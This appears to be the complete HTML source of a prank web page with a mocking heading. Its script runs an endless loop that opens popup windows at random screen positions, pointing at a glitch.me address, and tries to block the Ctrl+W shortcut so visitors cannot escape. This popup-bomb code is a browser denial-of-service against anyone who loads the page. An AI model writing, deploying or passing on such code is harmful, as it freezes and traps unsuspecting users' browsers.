<!--
******************************************************************************************************************************************************************************************

Oops!
You saw the source code for this site.
You are free to think what you like about this code, but please note that the copyright belongs to skikozou.
Please remember this when you look at the source code of this site in the future.
If you make something using the source code of this site and publish it, it would be good if you could let skikozou know so that there will be less misunderstanding.

******************************************************************************************************************************************************************************************
-->

<h1>you noob! hahaha!</h1>
<link rel="canonical" href="https://syncer.jp/Web/API_Interface/Reference/IDL/Element/requestFullscreen/">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/push.js/1.0.12/push.js"></script>
<script>
  while (true) {
    var x = Math.floor(Math.random() * (1300 - 0) + 0);
    var y = Math.floor(Math.random() * (600 - 0) + 0);
    var ran = "menubar=0,width=300,height=200,top=" + y + ",left=" + x;
    window.open("https://skikozou.glitch.me/test.html", "_blank", ran);
  window.open("https://skikozou.glitch.me/test.html"  ,"_blank","menubar=0,width=30000,height=200,top=0,left=0");
  }
  
  function tasknameFilter(e) {
  if (e.ctrlKey && e.key === "w") {
    e.stopPropagation();
  }
}
document.getElementById("taskname").addEventListener('keydown', tasknameFilter);
</script>